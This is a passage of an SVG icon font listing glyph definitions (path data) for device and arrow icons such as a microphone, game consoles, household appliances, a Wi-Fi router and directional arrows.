<glyph glyph-name="microphone" horiz-adv-x="1000" unicode="&#xea47;" d="M828 49c-37 54-81 101-141 130-77 37-165 33-228-38-27-30-50-63-75-94-19-23-38-46-59-67-21-20-45-21-71-6-12 8-24 16-34 26-27 26-33 53-18 81 7 13 19 20 23 19 2-1 5-2 7-3 15-3 30-7 43 4 64 53 128 106 191 160 47 38 93 76 139 115 5 5 11 9 16 14 9 8 5 18-9 24-54 23-93 59-114 114-6 14-9 25-11 24-1-1-1-2-2-2-59-70-117-139-176-209-38-45-76-91-114-136-12-15-17-31-13-49 2-10 0-16-6-23-42-49-46-104-9-150 15-19 34-36 54-49 50-33 102-28 146 13 13 13 25 26 37 41 27 35 53 71 81 106 21 26 46 47 81 53 45 9 86-4 124-30 51-34 88-82 119-135 9-17 23-22 37-14 14 7 17 22 8 39-8 14-17 29-26 42z m14 492c9 25 12 54 9 84-9 93-92 173-190 161-20-2-38-8-56-17-13-7-16-25-7-38 55-82 125-148 209-200 12-8 30-4 35 10z m-50-71c5 4-2 13-15 21-84 55-156 123-212 206-9 13-17 20-19 17-1-2-3-4-4-6-44-73-28-172 36-231 59-55 144-60 207-14 2 2 5 5 7 7z" />
<glyph glyph-name="monitor" horiz-adv-x="1000" unicode="&#xea48;" d="M1000 112v646h-1000v-646h476v-121h-159v-49h366v49h-159v121h476z m-972 618h944v-590h-944v590z" />
<glyph glyph-name="mouse" horiz-adv-x="1000" unicode="&#xea49;" d="M527 629c0 1-1 2-2 2-9 8-9 6 1 15 7 6 16 11 24 17 21 15 35 35 44 58 21 53-41 90-72 122-22 22-57-12-35-35 17-18 40-32 55-51 16-22-9-46-27-59-27-18-50-43-45-70-122-11-235-77-235-193v-325c0-143 119-260 265-260s265 117 265 260v325c0 127-119 188-238 194z m-242-194c0 86 95 136 193 144v-299c-89 4-162 24-193 34v121z m430-325c0-116-96-211-215-211s-215 95-215 211v152c45-13 128-33 228-33 63 0 133 8 202 32v-151z m0 203c-63-24-127-33-187-34v301c97-6 187-51 187-145v-122z" />
<glyph glyph-name="mp3-player" horiz-adv-x="1000" unicode="&#xea4a;" d="M585 324c0-91 0-182 0-273 0-6-1-9-8-9-12 1-23-1-34-5-6-2-9-1-13 4-32 36-81 48-126 31-43-16-73-57-74-105 0-17 0-17-18-17-46 0-91 0-137 0-42 0-67 26-67 70v272c0 99 0 199 0 298 0 41 26 66 66 66l26 0h316c45 0 69-25 69-69 0-88 0-175 0-263l0 0z m-238 32v0c49 0 97 0 145 0 7 0 9 2 9 9 0 61 0 121 0 182 1 9-2 11-10 11-96 0-192 0-287 0-9 0-12-3-12-12 0-60 0-120 0-180 0-8 2-11 10-10 48 0 97 0 145 0z m-69-174c0-25-1-49 0-73 0-18 4-20 20-11l126 73c13 7 13 13 0 20-43 25-86 50-129 75-12 7-17 4-17-10-1-25 0-50 0-74z m471 293c0-73-1-146 0-219 0-49 20-90 55-125 21-21 43-40 61-64 34-42 36-91 6-130-20-26-46-40-80-40-44-1-88 0-133 0-6 0-10-2-13-8-19-32-55-46-90-35-34 10-57 42-55 78 3 37 28 65 65 72 32 6 65-10 80-40 4-8 9-10 18-10 41 0 82 0 123 0 19 0 35 6 44 24 9 18 5 34-6 49-16 21-35 39-54 56-52 50-79 111-79 183 1 138 0 275 0 412 0 15 0 31-5 46-15 44-58 73-102 68-49-4-85-39-92-89-1-8-3-11-11-10-12 0-24 0-37 0-8-1-10 2-9 10 5 56 30 99 79 126 106 60 234-16 234-137 1-72 0-145 0-217 1 0 1 0 1 0z m-306-587c-35 0-65 23-74 56-9 34 5 69 35 87 29 18 67 14 93-9 6-5 5-8 0-14-28-29-39-64-31-104 3-15 3-15-12-16-4-1-7 0-11 0z" />
<glyph glyph-name="nintendo" horiz-adv-x="1000" unicode="&#xea4b;" d="M1000 2c-2 19-11 44-16 63-12 45-23 90-34 136-8 29-15 59-22 89-1 3-2 6-4 8 3 6 4 13 4 20v366c0 27-21 81-48 81h-759c-27 0-49-54-49-81v-366c0-7 1-13 4-19-2-3-3-6-4-9-7-30-14-60-22-90-11-45-22-90-34-135-5-19-14-44-15-63-3-23 7-43 22-59 16-16 21-3 42-3h870c21 0 28-13 44 3 15 16 23 36 21 59z m-797 91h-37l-5-31h-40l5 31h-37l6 30h110l-2-30z m-32 59c-25 0-46 14-46 31 0 17 21 30 46 30s46-13 46-30c0-17-20-31-46-31z m118-90l24 214h376l22-214h-422z m456 306h-490v275h490v-275z m33-208c-12 0-22 6-22 14 0 8 10 14 22 14s23-6 23-14c0-8-10-14-23-14z m23 43c0 8 11 14 23 14 13 0 23-6 23-14s-10-13-23-13c-12 0-23 6-23 13z m30-78c-13 0-23 6-23 14 0 8 10 14 23 14s22-6 22-14c0-8-10-14-22-14z m45 35c-13 0-23 6-23 14 0 8 10 14 23 14s22-6 22-14c0-8-10-14-22-14z" />
<glyph glyph-name="playstation-alt" horiz-adv-x="1000" unicode="&#xea4c;" d="M401 35c7 32 13 59 21 85 3 12 9 28 19 43l4 7c4 7 8 13 12 19 2 3 5 6 8 8 2 3 4 6 7 8 3 3 7 5 11 7 27 11 56 12 83 1 5-2 10-5 14-10h26c2 2 4 3 5 4v239l-380 80-56 5v-672l219 0c-7 15-9 29-9 42 0 15 1 30 2 47 4 31 9 61 14 87z m-170-113c-1 0-1 1-2 1-6 1-11 3-17 5-1 0-1 0-1-1v-4l-3 1c0 0 0 0 0 0v4c0 1 0 1-1 1 0 0-1 0-2 0v5l3 0c0 0 0 0 0 0v25c0 1 0 1 0 2 1 1 2 1 3 0l1-2 14-24c2-3 4-6 5-9 1-1 1-2 1-2 0-1 0-2-1-2z m1 22c-1 1-1 1-2 1 0 0 0 0-1 1v13c0 0 0 0 0 1 0 1-1 2-3 3 0 0-1 0-1 0l-13 4c-2 1-4 2-5 4-1 2-2 3-2 4v16c0 1 1 1 1 0 1 0 1 0 2 0 0 0 0 0 0-1v-13c0-3 2-4 5-5l12-4c2 0 3-1 5-2 1-2 2-4 2-5 0-6 0-11 0-16l0-1z m0 37c0-3-2-4-6-4-2 1-3 1-5 2-2 2-3 4-3 6l0 2v19c0 2-2 3-4 4l-2 1-6 1c-1 1-1 1-1 1v4c0 0 0 1 1 0 2 0 5-1 8-2 4-1 6-4 6-8v-20c0-2 1-3 4-4 1 0 2-1 2-1 2 0 3 1 3 3v25c0 1 0 1 1 0 1 0 1 0 2 0l0-29z m660 119c0-11 8-19 18-19s18 8 18 19-8 19-18 19c-10 0-18-9-18-19z m30 0c0-7-5-12-12-12s-12 5-12 12c0 7 5 12 12 12 7 0 12-5 12-12z m49-149c-3 29-8 57-13 85-6 27-12 55-20 82-4 12-8 24-15 34-5 9-10 17-16 25-1 2-3 3-4 4-2 1-3 1-3 3 0 1 0 2-1 2-1 1-3 2-4 2-19 9-39 9-59 1-1 0-2-1-2-3 0-3-1-5-4-5 0 0 0 0 0 0-5-3-10-3-15-3h-43v-64c0-9-7-16-16-16h-120c-8 0-16 7-16 16l1 64h-44c-5 0-10 1-15 3 0 0 0 0-1 0-2 0-3 2-3 5 0 2-1 3-3 3-19 8-39 8-58-1-2 0-3-1-4-2-1 0-2-1-2-2 0-2-1-2-2-3-2-1-3-2-4-4-6-8-11-16-17-25-6-10-11-22-14-34-8-27-14-55-20-82-5-28-10-56-13-85-2-14-3-28-3-42 1-19 5-32 22-46 31-25 72-9 81 4 9 14 16 34 22 52 5 15 10 30 15 44 1 5 5 7 9 9 0 0 1-1 2-1 21-16 48-15 68 1 1 1 3 2 4 2h109c1 0 3-1 4-2 21-16 48-17 69-1 0 0 1 1 2 1 4-2 7-4 9-9 5-14 9-29 14-44 6-18 14-38 22-52 9-13 51-29 81-4 18 14 22 27 22 46 0 14 0 28-2 42z m-380 207c0 7 5 12 11 12s11-5 11-12v-24c0-6-5-11-11-11s-11 5-11 11v24z m-68-124c-34 0-63 29-63 65 0 35 29 64 63 64s63-29 63-64c0-36-28-65-63-65z m81-64c-18 0-33 15-33 33 0 19 15 34 33 34s32-15 32-34c0-18-14-33-32-33z m72 33c-2 0-3-2-3-4 0 0 0-1 0-1v-6c0 0 0 0 0 0h-4c0 0-1 0-1 0 0 3 0 5 0 7 1 3 3 6 6 6 6 0 13 0 19 0 2 0 3 1 3 3 0 0 0 1 0 2 0 2-1 2-3 2h-24c0 0-1 0-1 1v2h28c2 0 5-3 5-6 0-1 0-2-1-4-1-1-2-2-4-2-1-1-1-1-2-1-6 1-12 1-18 1z m55 10c0 0 0 0-1-1h-12c0 0-1 0-1 0-1 0-2-1-2-2 0-1 0-1 0-1v-11c0-2-1-4-3-5-1-1-2-1-3-1h-15c-1 0-1 0-1 0v2c0 0 0 1 1 0h12c3 0 4 2 4 4v11c0 1 0 3 1 4 1 1 3 2 4 2h16c0-1 0-2 0-2z m48 145c0 7 5 12 11 12 6 0 11-5 11-12v-24c0-6-5-11-11-11-6 0-11 5-11 11v24z m9-188c-18 0-33 15-33 33 0 19 15 34 33 34s33-15 33-34c0-18-15-33-33-33z m81 64c-35 0-63 29-63 65 0 35 28 64 63 64 34 0 62-29 62-64 0-36-28-65-62-65z m-777-115l-65-60 128 0v672h-63v-612z m120 36c0 0-1 0-1 0h0v-22c0 0 0 0 0 0l15-4c1-1 1-1 1 0-5 9-10 17-15 26z m399 510v258l-371 127h-66v-296l59-5 378-84z m25-362h120c6 0 10 5 10 11v64c0 6-4 11-10 11h-120c-6 0-10-5-10-11v-64c0-6 4-11 10-11z m-544 451l63 0v296h-63v-296z m433-462c-1 1-3 1-4 0l-11-13c-2-2-4-5-4-8v-23c0-5 4-8 8-8h17c5 0 8 3 8 8v23c0 3-1 5-2 7l-12 14z m335 42h18l-9 15-9-15z m9-56c-10 0-18-8-18-19s8-19 18-19 18 9 18 19-8 19-18 19z m11-28l-2-2-8 9-9-9-2 2 9 9-9 9 2 2 9-9 8 9 2-2-8-9 8-9z m-58 58h15v-16h-15v16z m-301-5c1-1 3-1 4 0l12 14c1 2 2 4 2 7v23c0 5-3 9-7 9h-18c-4 0-8-4-8-9v-23c0-3 2-6 4-8l11-13z m348 56c-10 0-18-8-18-19s8-18 18-18 18 8 18 18-8 19-18 19z m-13-28l13 23 13-23h-26z m-339-30l-13 12c-2 2-5 3-7 3h-23c-5 0-8-4-8-8v-18c0-5 3-8 8-8h23c3 0 6 1 8 3l12 12c1 1 1 3 0 4z m313 18c-11 0-19-9-19-19s8-19 19-19 18 8 18 19-8 19-18 19z m10-29h-20v20h20v-20z m-269 26h-23c-3 0-5-1-7-3l-13-12c-1-1-1-3 0-4l12-12c2-2 5-3 8-3h23c4 0 8 3 8 8v18c0 4-4 8-8 8z m329-16c0-5 5-10 10-10s10 5 10 10-5 10-10 10-10-4-10-10z" />
<glyph glyph-name="psvita" horiz-adv-x="1000" unicode="&#xea4d;" d="M823 576h-646c-98 0-177-80-177-177v-98c0-98 79-177 177-177h646c98 0 177 79 177 177v98c0 97-79 177-177 177z m43-117c12 0 21-9 21-21 0-12-9-21-21-21-11 0-21 9-21 21 0 12 10 21 21 21z m17-123c22 0 39-18 39-39 0-22-17-40-39-40-22 0-39 18-39 40 0 21 17 39 39 39z m-838 83v37h37v41h37v-41h38v-37h-38v-37h-37v37h-37z m113-122c0-22-18-40-39-40-22 0-40 18-40 40 0 21 18 39 40 39 21 0 39-18 39-39z m25-154c-22 0-43 3-63 11-19 8-35 20-50 34 5 1 11 3 16 3h27c31 0 59-22 70-48h0z m627 56h-620v347h620v-347z m71-45c-20-8-41-11-63-11h0c11 26 39 48 70 48h27c5 0 11-2 16-3-15-14-31-26-50-34z m30 221c-11 0-21 9-21 21 0 11 10 21 21 21 12 0 21-10 21-21 0-12-9-21-21-21z m0 82c-11 0-21 10-21 21 0 12 10 21 21 21 12 0 21-9 21-21 0-11-9-21-21-21z m44-40c-11 0-21 9-21 21 0 12 10 21 21 21 12 0 22-9 22-21 0-12-10-21-22-21z" />
<glyph glyph-name="radio-mic" horiz-adv-x="1000" unicode="&#xea4e;" d="M721 304c0-97-95-194-189-194h-63c-95 0-189 97-189 194v195h-63v-195c0-130 126-259 252-259v-130h-189v-65h441v65h-189v130c126 0 252 129 252 259v195h-63l0-195z m-190 546h-62c-64 0-117-49-125-113h313c-8 64-61 113-126 113z m-188-546c0-72 56-130 126-130h63c70 0 126 59 126 130v383h-315v-383z" />
<glyph glyph-name="radio" horiz-adv-x="1000" unicode="&#xea4f;" d="M864 497h-553c-19 0-33 1-31 2 2 1 3 2 4 3 121 57 241 114 362 171 10-6 21-10 34-10 35 0 63 28 63 62s-28 63-63 63-62-28-62-63c0-2 0-4 0-6-154-73-308-146-462-219-4-2-10-3-16-3-6 0-13 0-19 0-11 0-19-16-19-35v-515c0-19 15-35 35-35h727c19 0 35 16 35 35v515c0 19-16 35-35 35z m-668-144v29c0 19 15 35 35 35h539c19 0 35-16 35-35v-29c0-19-16-35-35-35h-539c-20 0-35 16-35 35z m45-314c0-2-1-4-3-4h-28c-2 0-3 2-3 4v182c0 2 1 3 3 3h28c2 0 3-1 3-3v-182z m78 0c0-2-2-4-4-4h-28c-2 0-3 2-3 4v182c0 2 1 3 3 3h28c2 0 4-1 4-3v-182z m70 0c0-2-2-4-4-4h-28c-2 0-3 2-3 4v182c0 2 1 3 3 3h28c2 0 4-1 4-3v-182z m77 0c0-2-2-4-4-4h-27c-2 0-4 2-4 4v182c0 2 2 3 4 3h27c2 0 4-1 4-3v-182z m244-6c-53 1-96 44-96 97 0 52 44 96 96 96 53 0 96-43 96-97 0-53-44-96-96-96z" />
<glyph glyph-name="refrigerator" horiz-adv-x="1000" unicode="&#xea50;" d="M764-122h-528c-4 0-8 0-12 1 6-17 21-29 40-29h472c19 0 34 12 40 29-4-1-8-1-12-1z m42 847v83c0 23-19 42-42 42h-528c-23 0-41-19-41-42v-861c0-23 18-42 41-42h528c23 0 42 19 42 42v778h0z m-522-653h-12c-12 0-22 10-22 22v623c0 12 10 22 22 22h12c12 0 22-10 22-22v-623c0-12-10-22-22-22z" />
<glyph glyph-name="samsung-galaxy" horiz-adv-x="1000" unicode="&#xea51;" d="M681 850h-361c-47 0-84-38-84-84v-832c0-46 37-84 84-84h361c47 0 84 38 84 84v832c0 46-37 84-84 84z m-225-23h95c3 0 6-3 6-7s-3-6-6-6h-95c-3 0-6 3-6 6s3 7 6 7z m85-945h-76c-11 0-20 7-20 18s9 19 20 19h76c11 0 20-8 20-19s-9-18-20-18z m197 55h-470v826h470v-826z" />
<glyph glyph-name="surface-tablet" horiz-adv-x="1000" unicode="&#xea52;" d="M978 670h-955c-13 0-23-10-23-23v-594c0-13 10-23 23-23h955c12 0 22 10 22 23v594c0 13-10 23-22 23z m-482-620l-9 3v8h9v-11z m0 14h-9v8l9 3v-11z m17-19l-14 4v12h14v-16z m0 19h-14v12l14 4v-16z m427 29h-878v506h878v-506z" />
<glyph glyph-name="ui-head-phone" horiz-adv-x="1000" unicode="&#xea53;" d="M200 342c5-67 5-136 16-203 11-64 47-116 109-145 8-3 20 1 30 3 16 2 32 9 48 8 26-2 52-7 78-12 36-6 50-31 47-76-2-32-22-52-55-53-28-1-57-4-84 1-17 3-33 17-48 27-8 5-15 15-23 17-77 15-129 62-166 129-4 6-8 12-10 19-18 46-37 89-82 120-44 31-52 87-56 138-3 44-6 89-2 133 4 44 32 76 73 93 17 7 24 18 29 34 36 118 111 202 230 237 136 40 271 37 399-29 84-43 133-117 161-206 6-18 14-29 32-37 49-22 75-64 74-116 0-53-7-106-14-159-7-49-36-85-75-114-24-18-50-22-78-9-28 14-39 38-39 69 0 82-1 163 1 245 3 120-72 202-172 229-99 26-197 27-291-17-85-39-127-109-128-203 0-41 0-82 0-122l-4-1z" />
<glyph glyph-name="ui-keyboard" horiz-adv-x="1000" unicode="&#xea54;" d="M499 64c-140 0-281 0-421 0-49 0-78 30-78 79 0 138 0 276 0 414 0 49 29 79 78 79 283 0 565 0 847 0 44 0 75-31 75-75 0-141 0-282 0-423 0-43-31-74-75-74-142 0-284 0-426 0z m1 107c59 0 117 0 175 0 25 0 39 15 40 40 0 11 0 21-1 32 0 20-15 35-35 36-119 0-239 0-358-1-20 0-35-15-35-35-1-10 0-21 0-31 0-27 13-41 40-41 58 0 116 0 174 0z m429 268c0 30 0 59 0 89 0 21-15 36-36 36-24 1-47 1-71 0-21 0-36-15-36-37 0-10 0-21 0-32-1-14 5-25 17-33 13-8 19-20 19-35-1-26-1-52-1-77 1-20 16-35 36-36 11 0 23 0 34 0 23 0 38 15 38 38 0 29 0 58 0 87z m-768-268v0c17 0 35 0 53 0 20 0 36 15 36 35 0 12 0 25 0 37 0 21-16 35-36 36-36 0-71 0-106 0-21-1-36-16-37-37 0-11 0-22 0-34 0-22 15-37 37-37 18 0 35 0 53 0z m678 0h53c0 0 0 0 1 0 20 1 35 15 36 36 0 12 0 24 0 36-1 20-15 35-35 35-36 1-72 1-108 1-20-1-36-16-36-36 0-12 0-24 0-35 0-22 15-37 37-37 17 0 35 0 52 0z m-696 250c-12 0-24 1-36 0-20 0-35-15-36-35 0-12 0-24 0-36 1-21 16-36 36-36 24 0 48 0 72 0 20 0 35 16 35 36 1 12 1 24 0 35 0 21-15 36-36 36-12 1-23 0-35 0z m268 143c-6 0-11 0-16 0-23 0-38-14-38-37 0-6 0-11 0-17-3-41 14-54 53-54 39 0 55 11 55 55 0 40-12 57-54 53z m142-107c6 0 12 0 18 0 21 0 36 15 36 36 0 6 0 12 0 18 4 41-13 54-53 54-41 0-55-13-55-54 0-40 13-58 54-54z m144 107c-6 0-12 0-17 0-22 0-37-15-37-37 0-11 0-23 0-34 0-20 15-35 35-36 6 0 13 0 19 0 39-3 54 12 54 53 0 41-13 58-54 54z m-429-107c6 0 11 0 17 0 21 0 36 15 37 36 0 6-1 12 0 18 3 41-14 54-54 54-41 0-55-13-55-54 0-40 12-58 55-54z m36-143c6 0 12 0 18 0 20 1 35 16 35 36 0 13 1 25 0 37 0 19-15 34-34 34-7 1-13 0-20 1-39 3-54-13-54-54 0-41 14-57 55-54z m196 54c0 5 0 11 0 17 0 21-15 36-36 36-12 1-24 1-37 0-18 0-33-15-34-33-1-14-1-27 0-41 1-17 15-32 33-33 7 0 14 1 21 0 40-3 57 13 53 54z m90-54c6 0 12 0 17 0 20 0 36 15 36 35 0 7 0 13 0 19 3 40-12 54-53 54-40 0-55-12-55-54 0-41 13-57 55-54z m142 0c6 0 12 0 18 0 21 1 36 16 36 36 0 13 0 25 0 37-1 19-16 34-34 34-7 1-14 0-20 1-40 3-54-13-54-54 0-41 14-57 54-54z m-607 250c-4 0-8 0-12 0-28 0-42-13-42-40 0-5 1-9 0-14-3-40 14-54 54-54 41 0 54 14 54 55 0 41-13 57-54 53z" />
<glyph glyph-name="washing-machine" horiz-adv-x="1000" unicode="&#xea55;" d="M807 850h-615c-64 0-115-52-115-115v-770c0-63 51-115 115-115h615c64 0 116 52 116 115v770c0 63-52 115-116 115z m-211-72c34 0 62-28 62-63s-28-62-62-62c-35 0-62 28-62 62s27 63 62 63z m-96-738c-150 0-272 122-272 272 0 150 122 271 272 271s271-121 271-271c0-150-122-272-271-272z m288 613c-34 0-62 28-62 62s28 63 62 63 62-28 62-63-28-62-62-62z m-288-118c-124 0-224-100-224-223 0-124 100-224 224-224 123 0 223 100 223 224 0 123-100 223-223 223z m0-38c96 0 175-75 183-169-69 37-102-15-183-15-83 0-107 56-184 15 9 94 87 169 184 169z" />
<glyph glyph-name="wifi-router" horiz-adv-x="1000" unicode="&#xea56;" d="M868 159h-99c-8 0-14 6-14 14v260c0 31-25 55-56 55s-55-24-55-55v-260c0-8-6-14-14-14h-616c-8 0-14-6-14-14v-271c0-8 6-14 14-14h854c8 0 15 6 15 14v271c0 8-7 14-15 14z m-709-197c-26 0-47 21-47 47 0 26 21 47 47 47 26 0 48-21 48-47 0-26-22-47-48-47z m607 13c0-7-6-14-14-14h-433c-8 0-14 7-14 14v67c0 8 6 14 14 14h433c8 0 14-6 14-14v-67z m-159 542c26 22 58 33 92 33 33 0 65-11 91-31 6-5 15-5 20 0l63 62c5 5 5 14 0 20-48 42-109 65-174 65-36 0-70-7-103-21-27-12-52-27-73-47-6-6-6-15 0-20l63-61c6-5 15-5 21 0z m389 208c-38 35-81 62-128 82-54 22-110 33-169 33-59 0-116-11-170-34-47-20-90-47-128-82-6-6-6-15 0-20l62-62c6-5 15-5 21 0 59 53 135 82 215 82 80 0 155-28 214-81 6-5 15-5 21 0l62 62c5 6 5 15 0 20z" />
<glyph glyph-name="wii-u" horiz-adv-x="1000" unicode="&#xea57;" d="M866 607h-732c-74 0-134-60-134-134v-247c0-73 60-133 134-133h732c74 0 134 60 134 133v247c0 74-60 134-134 134z m-485-29h249c11 0 19-8 19-19 0-10-8-19-19-19h-249c-10 0-19 9-19 19 0 11 9 19 19 19z m-323-99c0 19 15 34 34 34 19 0 34-15 34-34s-15-35-34-35c-19 0-34 16-34 35z m123-129h-29v-29h-38v29h-28v38h28v29h38v-29h29v-38z m324-246c-12 0-21 10-21 22 0 11 9 21 21 21s22-10 22-21c0-12-10-22-22-22z m276 74h-562v334h562v-334z m55 168c-11 0-20 9-20 20 0 11 9 19 20 19s19-8 19-19c0-11-9-20-19-20z m44-40c-11 0-20 9-20 20 0 10 9 19 20 19s19-9 19-19c0-11-9-20-19-20z m0 79c-11 0-20 8-20 19 0 11 9 20 20 20s19-9 19-20c0-11-9-19-19-19z m43-39c-11 0-19 9-19 20 0 11 8 19 19 19s19-8 19-19c0-11-8-20-19-20z m-4 98c-19 0-34 16-34 35s15 34 34 34c19 0 35-15 35-34s-16-35-35-35z" />
<glyph glyph-name="windows-lumia" horiz-adv-x="1000" unicode="&#xea58;" d="M220 850v-1000h561v1000h-561z m236-30h88v-5h-88v5z m37-926l-26 3v22h26v-25z m0 29h-26v22l26 3v-25z m40-35l-35 5v26h35v-31z m-35 35v26l35 5v-31h-35z m242 67h-480v800h480v-800z" />
<glyph glyph-name="wireless-mouse" horiz-adv-x="1000" unicode="&#xea59;" d="M693 850h-160l0-95c24-12 40-36 40-64v-107c0-28-16-52-39-64l0-148c0-19-15-34-33-34h0c-18 0-33 15-33 34l-1 147c-23 13-40 37-40 65v107c0 28 16 52 39 64l0 95h-159c-85 0-155-69-155-155v-497c0-192 156-348 348-348 192 0 348 156 348 348v497c0 86-69 155-155 155z" />
<glyph glyph-name="xbox-360" horiz-adv-x="1000" unicode="&#xea5a;" d="M557 643c-2 0-3 0-4-1s-1-2-1-4c0-1 0-2 1-3 1-1 3-1 4-1 1 0 2 0 3 1s2 2 2 4c0 1 0 2-1 3-1 1-2 1-4 1z m11 88c1 0 4 1 4 2 1 1 2 2 2 3v7h-12v-7c0-1 1-2 2-3 0-1 2-2 4-2z m0-107c-1 1-4 1-7 1-3 0-5 0-6-1-2-1-3-2-3-4 0-1 0-3 2-4 1-1 4-1 7-1 3 0 5 0 7 1 2 1 3 2 3 4 0 2-1 3-3 4z m52-416l17 612s-5 15-9 21c-4 6-3 7-3 7l-86 1v1l-37 0-37 0v-1l-86-1s-3-1-7-7c-4-6-7-21-7-21l17-612-16-327s-8-26 6-28c10-2 56-3 93-3v0s11 0 19 0c7 0 18 0 18 0v0c37 0 101 1 111 3 14 2 22 28 22 28l-15 327z m-73 545l10 6-10 7v4l14-9 13 8v-4l-9-6 9-6v-4l-13 8-14-8v4z m0-7h27v-11c0-3-1-5-3-6-1-1-2-1-3-1-2 0-3 0-4 1 0 0-1 1-1 2-1-1-1-2-2-3-1-1-2-2-4-2-2 0-4 1-6 2-2 1-4 4-4 7v11z m-45-600c-28 0-51 23-51 51s23 50 51 50 50-22 50-50-22-51-50-51z m68 467c-2-1-5-1-8-1-4 0-6 0-8 1-3 2-5 4-5 7 0 3 1 5 4 6 2 2 5 2 8 2 3 0 5 0 7-1 4-1 5-4 5-7 0-3-1-5-3-7z m-17 41c1-1 2-1 3-1 2 0 3 0 4 1 0 1 1 3 1 5v1h2s0-1 0-1v-1c0-1 0-2 1-2 0-2 1-2 3-2 1 0 2 0 3 1 0 1 1 2 1 3 0 2-3 3-4 4-1 0-5 1-5 1v2c4 0 5 0 6-1 2-1 4-3 4-6 0-2 0-4-1-6-1-1-2-2-4-2-2 0-3 1-4 2 0 0-1 1-1 1 0-1-1-2-2-2-1-1-2-2-3-2-3 0-5 1-6 3-1 1-2 3-2 6 0 3 0 5 1 6 2 1 1 2 5 2v-3c-4 0-2-1-2-1-2-1-2-2-2-4 0-2 1-3 2-4z m16-21c-2-1-3-2-7-2v3c4 0 4 1 5 1 1 1 3 2 3 3 0 2-1 3-2 4-2 1-4 2-6 2 1-1 1-2 2-3 0-1 1-2 1-3 0-2-1-4-2-5-2-2-3-2-6-2-2 0-4 0-6 2-1 1-2 3-2 6 0 2 1 4 2 5 2 2 5 3 9 3 3 0 5-1 7-1 4-2 5-4 5-8 0-2-2-4-3-5z m5 61l-9-6 9-7v-3l-13 8-14-9v4l10 7-10 7v4l14-9 13 8v-4z m-4 9c-2-2-4-3-8-3-3 0-6 1-9 3-3 2-4 5-4 9 0 4 1 7 4 9 2 2 5 3 9 3 3 0 6-1 8-2 3-3 5-6 5-10 0-4-2-7-5-9z m-9 18c-2 0-5-1-6-2-2-2-3-4-3-7 0-3 1-5 3-6 2-2 4-2 7-2 3 0 5 0 7 2 2 1 3 3 3 6 0 3-1 5-3 6-2 2-4 3-8 3z m-7 10c0-1 2-1 3-1 1 0 3 1 4 2 0 1 1 2 1 4v7h-11v-8c0-2 1-4 3-4z" />
<glyph glyph-name="arrow-down" horiz-adv-x="1000" unicode="&#xea5b;" d="M772 358l-53 54c-9 8-24 8-32 0l-137-137v352c0 13-10 23-23 23h-90c-13 0-23-10-23-23v-343l-127 128c-9 8-23 8-32 0l-54-54c-8-9-8-23 0-32l270-269c9-9 23-9 32 0l269 269c9 9 9 23 0 32z" />
<glyph glyph-name="arrow-left" horiz-adv-x="1000" unicode="&#xea5c;" d="M777 422h-343l128 128c8 9 8 23 0 32l-54 53c-9 9-23 9-32 0l-269-269c-9-9-9-23 0-32l269-269c9-9 23-9 32 0l54 53c8 9 8 23 0 32l-137 137h352c13 0 23 10 23 23v90c0 12-10 22-23 22z" />
<glyph glyph-name="arrow-right" horiz-adv-x="1000" unicode="&#xea5d;" d="M223 422h343l-128 128c-8 9-8 23 0 32l54 53c9 9 23 9 32 0l269-269c9-9 9-23 0-32l-269-269c-9-9-23-9-32 0l-54 53c-8 9-8 23 0 32l137 137h-352c-13 0-23 10-23 23v90c0 12 10 22 23 22z" />
<glyph glyph-name="arrow-up" horiz-adv-x="1000" unicode="&#xea5e;" d="M427 73v343l-127-128c-9-8-23-8-32 0l-54 54c-8 9-8 23 0 32l270 269c9 9 23 9 32 0l269-269c9-9 9-23 0-32l-53-54c-9-8-23-8-32 0l-137 137v-352c0-13-10-23-23-23h-90c-13 0-23 10-23 23z" />
<glyph glyph-name="block-down" horiz-adv-x="1000" unicode="&#xea5f;" d="M937-88v876h-875v-876h875z m-117 590l-320-329-320 329 26 25 294-303 294 303 26-25z" />
<glyph glyph-name="block-left" horiz-adv-x="1000" unicode="&#xea60;" d="M62-86h875v876h-875v-876z m615 732l-303-294 303-294-25-26-329 320 329 320 25-26z" />
<glyph glyph-name="block-right" horiz-adv-x="1000" unicode="&#xea61;" d="M938 788h-876v-876h875v876z m-615-732l303 294-303 294 25 26 329-320-329-320-25 26z" />
<glyph glyph-name="block-up" horiz-adv-x="1000" unicode="&#xea62;" d="M62 788v-876h875v876h-875z m732-615l-294 303-294-303-26 25 320 329 320-329-26-25z" />
<glyph glyph-name="bubble-down" horiz-adv-x="1000" unicode="&#xea63;" d="M511 175c-6-6-16-6-22 0l-130 130c-6 6-16 6-23 0l-37-38c-7-6-7-16 0-22l190-190c6-6 16-6 22 0l190 190c6 6 6 16 0 22l-38 38c-6 6-16 6-22 0l-130-130z m72 154c0-46-37-83-83-83s-83 37-83 83 37 83 83 83 83-37 83-83z m-23 159c0-33-27-60-60-60s-60 27-60 60c0 33 27 60 60 60 33 0 60-27 60-60z m-17 119c0-24-19-44-43-44s-44 20-44 44 20 43 44 43 43-19 43-43z" />
<glyph glyph-name="bubble-left" horiz-adv-x="1000" unicode="&#xea64;" d="M325 339c-6 6-6 16 0 22l130 130c6 6 6 16 0 23l-38 37c-6 7-16 7-22 0l-190-190c-6-6-6-16 0-22l190-190c6-6 16-6 22 0l38 38c6 6 6 16 0 22l-130 130z m237 11c0-46-37-83-83-83s-83 37-83 83 37 83 83 83 83-37 83-83z m136 0c0-33-27-60-60-60s-60 27-60 60c0 33 27 60 60 60s60-27 60-60z m102 0c0-24-19-43-43-43s-44 19-44 43 20 43 44 43 43-19 43-43z" />
<glyph glyph-name="bubble-right" horiz-adv-x="1000" unicode="&#xea65;" d="M675 339c6 6 6 16 0 23l-130 129c-6 6-6 17 0 23l38 38c6 6 16 6 22 0l190-190c7-7 7-17 0-23l-190-190c-6-6-16-6-22 0l-38 38c-6 6-6 16 0 22l130 130z m-70 11c0-46-38-83-84-83s-83 37-83 83c0 46 38 83 83 83s84-37 84-83z m-183 0c0-33-27-60-60-60s-60 27-60 60 27 60 60 60 60-26 60-60z m-135 0c0-24-20-43-44-43s-43 19-43 43 19 44 43 44 44-20 44-44z" />
